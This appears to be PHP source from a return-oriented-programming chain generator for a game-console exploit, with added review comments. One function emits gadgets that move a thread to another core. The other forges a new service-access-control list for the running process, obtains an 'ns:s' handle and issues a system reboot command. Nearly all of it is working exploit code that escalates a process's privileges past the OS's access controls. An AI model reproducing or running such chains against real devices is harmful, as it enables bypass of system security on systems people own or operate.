/**
 * Emit the chain fragment that hands the current thread to another core.
 *
 * Emission order (each call below appends words to the chain, so the
 * statement order IS the stack layout the gadgets consume -- do not
 * rearrange):
 *   1. ropgen_callfunc() runs $ROP_OSGetCurrentThread, leaving the
 *      OSThread* in r3 and $ROP_OSSetThreadAffinity in r28 (per the
 *      original author's note); 0x2 becomes the second argument of the
 *      affinity call.
 *   2. $ROP_CALLR28_POP_R28_TO_R31 calls r28, i.e. OSSetThreadAffinity on
 *      that thread, then pops a fresh r28..r31 from the chain.
 *   3. The popped r28 is $ROP_OSYieldThread, so the second CALLR28 gadget's
 *      call goes to OSYieldThread -- presumably so the scheduler resumes
 *      the thread on the newly-allowed core (core 1, going by the function
 *      name; TODO confirm against the target's OS headers).
 *
 * Takes no parameters and returns nothing; all output goes through
 * ropgen_callfunc() / ropchain_appendu32().
 *
 * NOTE(review): the argument order of ropgen_callfunc() here (function
 * first, $ROP_OSSetThreadAffinity last) differs from the calls in
 * generateropchain_type4() (r0..r3, return gadget, function). The two
 * functions appear to target different ropgen helpers -- verify the
 * helper's signature before reusing either pattern.
 */
function ropgen_switchto_core1()
{
    global $ROP_OSGetCurrentThread, $ROP_OSSetThreadAffinity, $ROP_OSYieldThread, $ROP_CALLR28_POP_R28_TO_R31;

    ropgen_callfunc($ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, $ROP_OSSetThreadAffinity); //Set r3 to current OSThread* and setup r31 + the r28 value used by the below.

    ropchain_appendu32($ROP_CALLR28_POP_R28_TO_R31); //ROP_OSSetThreadAffinity(<output from the above call>, 0x2);
    ropchain_appendu32($ROP_OSYieldThread); //r28
    ropchain_appendu32(0x0); //r29
    ropchain_appendu32(0x0); //r30
    ropchain_appendu32(0x0); //r31
    ropchain_appendu32(0x0); // unlabelled slot in the original; presumably a frame/padding word consumed by the gadget's epilogue -- TODO confirm

    ropchain_appendu32($ROP_CALLR28_POP_R28_TO_R31); // calls r28 (now OSYieldThread), then pops r28..r31 again
    ropchain_appendu32(0x0); //r28
    ropchain_appendu32(0x0); //r29
    ropchain_appendu32(0x0); //r30
    ropchain_appendu32(0x0); //r31
    ropchain_appendu32(0x0); // same unlabelled trailing slot as above
}
/**
 * Emit the "type 4" chain: re-register the running process with srv:pm
 * under a new service-access-control list, obtain an "ns:s" handle, and
 * send it the command the original author labels NSS:RebootSystem.
 *
 * Steps, in emission order (every ropgen_* / ropchain_* call appends words
 * to the chain, so statement order is the chain layout and must be kept):
 *   1. Write 1 to $SRV_REFCNT so that srv_shutdown and srvpm_initialize
 *      below do the real shutdown / initialization (author's note).
 *   2. Send a cmdbuf carrying the current process id to the srv port to
 *      unregister the process.
 *   3. Build a 0x60-byte table of 8-byte service names at $ROPHEAP + 0x100
 *      (12 slots of two u32 words; the words are the ASCII names encoded
 *      little-endian and zero-padded, slots 0xa-0xb are empty) and send a
 *      second cmdbuf whose word 4 points at that table to re-register.
 *   4. Call srv_GetServiceHandle for slot 9 of the table ("ns:s"), storing
 *      the handle at $ROPHEAP + 0xc, then send a cmdbuf through that handle.
 *
 * Takes no parameters and returns nothing. ropgen_condfatalerr() follows
 * each function call; presumably it emits a result check -- its exact
 * behaviour is defined elsewhere, confirm before relying on it.
 *
 * NOTE(review): several names in the `global` list are not referenced in
 * this body ($ROP_INFINITELP, $POPLRPC, $ROP_POP_R0R6PC, $ROP_POP_R0R8PC,
 * $ROP_STR_R1TOR0, $ROP_POP_R0PC, $svcGetProcessId, $ROP_MEMSETOTHER);
 * they are harmless but obscure which gadgets this chain actually needs.
 */
function generateropchain_type4()
{
    global $ROPHEAP, $ROP_INFINITELP, $POPPC, $POPLRPC, $ROP_POP_R0R6PC, $ROP_POP_R0R8PC, $ROP_STR_R1TOR0, $ROP_POP_R0PC, $SRVPORT_HANDLEADR, $srv_shutdown, $svcGetProcessId, $srv_GetServiceHandle, $srvpm_initialize, $SRV_REFCNT, $ROP_MEMSETOTHER;

    // Left commented out in the original (marker words, apparently for locating the chain in a dump).
    //ropchain_appendu32(0x40404040);
    //ropchain_appendu32(0x80808080);

    ropgen_writeu32($SRV_REFCNT, 1, 0, 1); //Set the srv reference counter to value 1, so that the below function calls do the actual srv shutdown and "srv:pm" initialization.

    ropgen_callfunc(0, 0, 0, 0, $POPPC, $srv_shutdown);
    ropgen_condfatalerr();
    ropgen_callfunc(0, 0, 0, 0, $POPPC, $srvpm_initialize);
    ropgen_condfatalerr();

    ropgen_writeu32_cmdbuf(0, 0x4040040); //Write the cmdhdr.
    ropgen_write_procid_cmdbuf(1); //Write the current processid to cmdbuf+4.
    ropgen_sendcmd($SRVPORT_HANDLEADR, 1); //Unregister the current process with srvpm.

    // Service-access-control table: index = slot * 2 + word. Each slot is two
    // u32 words holding the ASCII name little-endian, zero-padded to 8 bytes.
    $databuf = array();
    $databuf[0x0 * 2 + 0] = 0x3a545041; //"APT:U"
    $databuf[0x0 * 2 + 1] = 0x55;
    $databuf[0x1 * 2 + 0] = 0x3a723279; //"y2r:u"
    $databuf[0x1 * 2 + 1] = 0x75;
    $databuf[0x2 * 2 + 0] = 0x3a707367; //"gsp::Gpu"
    $databuf[0x2 * 2 + 1] = 0x7570473a;
    $databuf[0x3 * 2 + 0] = 0x3a6d646e; //"ndm:u"
    $databuf[0x3 * 2 + 1] = 0x75;
    $databuf[0x4 * 2 + 0] = 0x553a7366; //"fs:USER"
    $databuf[0x4 * 2 + 1] = 0x524553;
    $databuf[0x5 * 2 + 0] = 0x3a646968; //"hid:USER"
    $databuf[0x5 * 2 + 1] = 0x52455355;
    $databuf[0x6 * 2 + 0] = 0x3a707364; //"dsp::DSP"
    $databuf[0x6 * 2 + 1] = 0x5053443a;
    $databuf[0x7 * 2 + 0] = 0x3a676663; //"cfg:u"
    $databuf[0x7 * 2 + 1] = 0x75;
    $databuf[0x8 * 2 + 0] = 0x703a7370; //"ps:ps"
    $databuf[0x8 * 2 + 1] = 0x73;
    $databuf[0x9 * 2 + 0] = 0x733a736e; //"ns:s"
    $databuf[0x9 * 2 + 1] = 0x0;
    $databuf[0xa * 2 + 0] = 0x0; // empty slot
    $databuf[0xa * 2 + 1] = 0x0;
    $databuf[0xb * 2 + 0] = 0x0; // empty slot
    $databuf[0xb * 2 + 1] = 0x0;
    ropgen_writeregdata_wrap($ROPHEAP + 0x100, $databuf, 0, 0x60); // 0x60 = 0xc slots * 8 bytes, the whole table

    ropgen_writeu32_cmdbuf(0, 0x4030082);
    ropgen_write_procid_cmdbuf(1); //Write the current processid to cmdbuf+4.
    ropgen_writeu32_cmdbuf(2, 0x18);
    ropgen_writeu32_cmdbuf(3, 0x180002);
    ropgen_writeu32_cmdbuf(4, $ROPHEAP + 0x100); // address of the service table written above
    ropgen_sendcmd($SRVPORT_HANDLEADR, 1); //Re-register the current process with srvpm with a new service-access-control list.

    // 0x9 * 8 selects slot 9 of the table, i.e. the "ns:s" entry.
    ropgen_callfunc($ROPHEAP + 0xc, $ROPHEAP + 0x100 + 0x9 * 8, 4, 0, $POPPC, $srv_GetServiceHandle); //Get the service handle for "ns:s", out handle is @ $ROPHEAP+0xc.
    ropgen_condfatalerr();

    ropgen_writeu32_cmdbuf(0, 0x100180);
    ropgen_writeu32_cmdbuf(1, 1); //flag=1 for titleinfo is set.
    ropgen_writeu32_cmdbuf(2, 0); //programID-low
    ropgen_writeu32_cmdbuf(3, 0); //programID-high
    ropgen_writeu32_cmdbuf(4, 2); //mediatype
    ropgen_writeu32_cmdbuf(5, 0); //reserved
    ropgen_writeu32_cmdbuf(6, 0); //u8
    ropgen_sendcmd($ROPHEAP + 0xc, 0); //NSS:RebootSystem

    ropchain_appendu32(0x50505050); // unlabelled trailing word in the original; its role is not stated in this source
}